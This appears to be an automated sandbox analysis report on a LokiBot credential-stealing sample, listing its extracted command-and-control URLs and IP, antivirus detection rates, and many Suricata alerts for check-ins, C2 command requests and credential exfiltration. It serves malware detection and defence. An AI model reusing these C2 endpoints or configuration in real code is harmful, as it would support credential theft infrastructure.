Source: http://alphastand.win/alien/fre.php	Avira URL Cloud: Label: malware
Source: http://alphastand.trade/alien/fre.php	Avira URL Cloud: Label: malware
Source: http://alphastand.top/alien/fre.php	Avira URL Cloud: Label: phishing
Source: http://94.156.177.41/simple/five/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.0yWVteGq5T.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cb\u00ce\u00d0\u008c\u0096\u0092\u008f\u0093\u009a\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}

Multi AV Scanner detection for submitted file

Source: 0yWVteGq5T.exe	ReversingLabs: Detection: 97%
Source: 0yWVteGq5T.exe	Virustotal: Detection: 87%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 0yWVteGq5T.exe

Joe Sandbox ML: detected

Source: 0yWVteGq5T.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

0_2_00403D74

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: 4x nop then xor byte ptr [esi], bl		0_2_004036F2
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: 4x nop then cmp byte ptr [esi], 00000000h		0_2_004036F2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49715
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49721 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49757
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49726
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49712
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49713 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49721
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49713
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49793
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49732
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49833
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49773 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49710
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49818
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49755
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49775
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49736
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49773
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49799
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49781
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49836 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49828
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49787
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49836
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49811
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49823
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49863 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49848
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49863 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49863 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49854
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49863 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49863 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49859
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.6:49863
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49873 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49873 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49885 -> 94.156.177.41:80
